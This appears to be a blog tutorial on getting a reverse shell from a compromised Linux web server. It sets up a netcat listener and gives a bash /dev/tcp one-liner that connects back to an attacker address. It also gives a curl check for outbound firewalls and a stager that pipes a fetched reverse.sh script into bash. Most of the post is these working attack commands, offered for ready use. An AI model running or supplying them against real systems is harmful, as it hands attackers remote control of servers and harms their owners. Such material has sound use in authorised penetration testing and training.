Sometimes we want to spawn a reverse shell from a server we have just pwned, especially a Linux web server, and generating a payload with msfvenom is more trouble than it is worth. Here are some easy bash-based reverse shells.
Setting up a listening port for incoming TCP connections
We can use netcat to listen for incoming TCP connections from the pwned server.
// Usage
$ nc -lnvp <port>

// Example
$ nc -lnvp 7337
listening on [any] 7337 ...
Based on the example above, our system will listen for incoming connections on port 7337.
Note that if you are running your system in a virtual machine with NAT networking, remember to configure your IP address and port forwarding so the target can actually reach the listener. To save yourself that hassle, use a bridged adapter instead.
To create a reverse TCP shell via Bash (the /dev/tcp pseudo-device is a bash feature, not a POSIX sh one, which is why the command is wrapped in /bin/bash -c instead of relying on whatever /bin/sh the server uses):
// Usage
/bin/bash -c 'bash -i >& /dev/tcp/<Your IP>/<Your listening port> 0>&1'

// Example
/bin/bash -c 'bash -i >& /dev/tcp/10.10.1.1/7337 0>&1'
Pentestmonkey also maintains many other reverse shell one-liners that can be caught with the same netcat listener; they can be found here.
Reverse shell troubleshooting
There are also situations where none of the reverse shells work. To tell whether a firewall is blocking outbound connections or whether it is just a quoting/parsing issue in our reverse shell command on the server side, we can use curl to test the connection from the target:
// Usage
curl <your ip>:<your listening port>

// Example
curl 10.10.1.1:7337
If no firewall or other factor is stopping the outgoing connection, your netcat listener should receive an HTTP request as shown below (this listener was started without -n, hence the inverse host lookup message). curl will hang waiting for an HTTP response that netcat never sends, so press Ctrl-C on the target once the request appears.
$ nc -lvp 7337
listening on [any] 7337 ...
192.168.1.2: inverse host lookup failed: Unknown host
connect to [10.10.1.1] from (UNKNOWN) [192.168.1.2] 29727
GET / HTTP/1.1
Host: 10.10.1.1:7337
User-Agent: curl/7.58.0
Accept: */*
Since curl can reach us, we can build a simple stager: use curl to fetch a shell script from our machine and pipe its contents into bash to spawn the reverse shell. Because the payload lives in a file on our side, it sidesteps the quoting and escaping problems that often break a one-liner passed through a web application.
In the shell script, reverse.sh:
bash -i >& /dev/tcp/10.10.1.1/7337 0>&1
Inside the same directory as reverse.sh, launch a Python HTTP server:
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Keep your netcat listener running on port 7337 (or whichever port you put in reverse.sh).
Next, change the curl command to the following. Note that it now targets port 8000, where the Python http.server is serving files over HTTP, not the netcat port:
curl 10.10.1.1:8000/reverse.sh | bash
This way, curl fetches reverse.sh from our Python http.server on port 8000 and pipes its contents into bash, which executes it. Our netcat listener on port 7337 should then receive the connection, giving us an interactive reverse shell.
I hope this post has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂